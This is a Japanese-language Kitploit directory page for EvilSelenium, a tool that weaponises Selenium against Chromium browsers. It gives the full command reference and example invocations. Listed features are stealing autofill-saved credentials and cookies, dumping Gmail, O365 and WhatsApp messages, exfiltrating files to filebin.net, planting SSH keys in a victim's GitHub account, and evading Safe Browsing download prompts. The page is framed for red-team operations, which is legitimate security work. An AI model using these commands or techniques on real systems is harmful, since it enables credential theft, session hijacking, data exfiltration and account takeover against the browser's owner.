Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
EvilSelenium — Seleniumを武器化し、Chromiumブラウザからの資格情報窃取、クッキーダンプ、電子メール流出、ファイル抽出を自動化し、レッドチーム作戦に活用します。 | Kitploit
ツール/GitHubGitHub/mrd0x/evilselenium
フィッシングツールデータ流出情報収集ポストエクスプロイトソーシャルエンジニアリングレッドチーミング
GitHubmrd0x/evilselenium

EvilSelenium

Seleniumを武器化し、Chromiumブラウザからの資格情報窃取、クッキーダンプ、電子メール流出、ファイル抽出を自動化し、レッドチーム作戦に活用します。

リポジトリを見る
605934年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

EvilSelenium

EvilSeleniumは、Seleniumを悪用してChromiumベースのブラウザを標的にする新しいプロジェクトです。現在の機能は以下の通りです:

  • 保存された認証情報の窃取(自動入力経由)
  • Cookieの窃取
  • Webサイトのスクリーンショット取得
  • Gmail/O365メールのダンプ
  • WhatsAppメッセージのダンプ
  • ファイルのダウンロードと外部流出
  • GitHubへのSSHキー追加

または、既存の機能を拡張して自分のニーズに合わせることもできます(例:ユーザーのGDrive/OneDriveからファイルをダウンロード)。

注意

  1. このツールを実行すると、パスワードとアクティブなセッションを含むユーザーのブラウザプロファイルで実行できるように、既存のブラウザプロセスがすべて終了されます。

  2. このツールは約1週間で構築したもので、十分なテストを行っていないため、バグが存在する可能性があります。

  3. Seleniumモジュールは常に安定しているわけではありません。Webサイトの絶え間ない変更により、一部のモジュールが時々動作しなくなる可能性があります。既存のモジュールが意図したとおりに動作するよう最善を尽くしてメンテナンスしますが、その点はご了承ください。

使い方

root@kitploit:~
EvilSelenium.exe /?

/help - このヘルプメニューを表示します。

設定:
/install - chromedriverとSelenium webdriverをインストールします。一度だけ実行してください。

グローバル:(すべてのコマンドで使用可能)
/browserdir [appdata_local_routing] - カスタムブラウザを使用します。入力は%appdatalocal%ディレクトリ内のルーティング(例:"Microsoft\Edge")です。

偵察:
/enumsavedsites [out_path] - スクリーンショットを使ってパスワードが保存されているWebサイトを確認します。
/screenshot [website] [out_path] - 指定されたWebページのスクリーンショットを取得します。

認証情報:
/autorun - 一般的なWebサイトから保存された認証情報を抽出します。
/dynamicid [login_page] [username_id] [password_id] - ユーザー名フィールドIDとパスワードフィールドIDを指定して、Webサイトから保存された認証情報を抽出します。
/dynamicname [login_page] [username_name] [password_name] - ユーザー名フィールドのname値とパスワードフィールドのname値を指定して、Webサイトから保存された認証情報を抽出します。
/dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - ユーザー名フィールドのname値、パスワードフィールドのname値、およびそれらの位置を指定して、Webサイトから保存された認証情報を抽出します。

Cookie:
/cookies [website] - 指定されたWebサイトのCookieを取得します。

モジュール:
/download [file_url] [seconds] - ファイルをダウンロードし、ダウンロード完了までの待機時間を指定します。ファイル拡張子は実行可能ファイルにしてはいけません。
/exfil [local_file] [seconds] - ファイルをfilebin.netにアップロードし、ダウンロードリンクを出力します。
/gmail [out_path] [num_of_emails] - ユーザーが認証されている場合、mail.google.comからメールを取得します。最大50件。
/outlook [out_path] [num_of_emails] - ユーザーが認証されている場合、Outlookからメールを取得します。
/o365 [out_path] [num_of_emails] - ユーザーが認証されている場合、O365 Outlookからメールを取得します。
/github [key] - ユーザーが認証されている場合、SSHキーをGitHubに追加します。
/whatsapp [out_path] - ユーザーが認証されている場合、WhatsAppメッセージを取得します(ベータ版)。

セットアップ

/installコマンドは、必要なChrome DriverとSelenium WebDriverをダウンロードします。EvilSeleniumはChromeバージョン100〜90で動作します。

Windows 10、Chrome v97およびv90でテスト済み。

root@kitploit:~
EvilSelenium.exe /install

グローバル設定

デフォルトではEvilSeleniumはGoogle ChromeのUser Dataフォルダを使用してデータを取得しようとしますが、他のChromiumベースのブラウザもサポートされています。
異なるChromeベースのブラウザを使用するには、%localappdata%ディレクトリ内のブラウザのルーティングに続けて/browserdirを追加します。 以下はいくつかの一般的なブラウザの例です(任意のCLIコマンドに追加する必要があります):

  1. Brave - /browserdir BraveSoftware\Brave-Browser
  2. Microsoft Edge - /browserdir Microsoft\Edge
  3. Vivaldi - /browserdir Vivaldi

偵察モジュール

/enumsavedsites - これにより、chrome://settings/passwordsのスクリーンショットを取得します。

/screenshot - 任意のWebサイトのスクリーンショットを取得します。ユーザーがそのWebサイトに認証されている場合、認証済みのスクリーンショットが取得できます:)。

認証情報モジュール

重要: 認証情報モジュールは、自動入力から認証情報を盗むためにCookieを削除します。理想的には、Cookieをエクスポートしたい場合は認証情報モジュールを最後に使用するべきです。

/autorun - 一般的なWebサイト向けのプリビルドテンプレート。今後も追加していきます。

/dynamicid - ログインURLと、ユーザー名入力フィールドのIDおよびパスワードフィールドのIDを指定します。これはdocument.getElementById()と同等です。

/dynamicname - フィールドにIDがない場合、フィールドのname値を指定します。name値の最初のインデックスが選択されます。これはdocument.getElementsByName()[0].valueと同等です。

/dynamicname2 - フィールドのname値とそのインデックス位置を指定します。これはdocument.getElementsByName()[x].value(xは指定された位置)と同等です。

Cookieモジュール

/cookies - 指定されたWebサイトのCookieをダンプします。

その他のモジュール

これらは、Seleniumで可能なアクションの例として作成した追加モジュールです。

/download - ファイルをダウンロードし、ダウンロード完了までの待機時間を指定します。Chromeのセーフブラウジングプロンプトを回避するために、ダウンロード前に実行可能ファイル以外のファイル拡張子をファイルに付加する必要があります。

/exfil - ファイルをfilebin.netにアップロードし、アップロード完了までの待機時間を指定します。アップロードが完了すると、ファイルのダウンロードリンクが出力されます。

/gmail - ユーザーが認証されている場合、mail.google.comからメールを取得します。最大50件。

/outlook - ユーザーが認証されている場合、Outlookからメールを取得します。

/o365 - ユーザーが認証されている場合、O365 Outlookからメールを取得します。

/github - ユーザーが認証されている場合、SSHキーをGitHubに追加します。

/whatsapp - ユーザーが認証されている場合、WhatsAppメッセージを取得します(ベータ版)。

コマンド例

root@kitploit:~
EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloads

EvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_password

EvilSelenium.exe /dynamicname https://linkedin.com session_key session_password

デモ

Example

サポート

  • Twitterでフォローしてください @mrd0x
  • BTCウォレット: 38ApE9ciNHiXzEaQExLXdwM6TrEpz2wCUi (もちろんコーヒーのためです)
ツールをダウンロード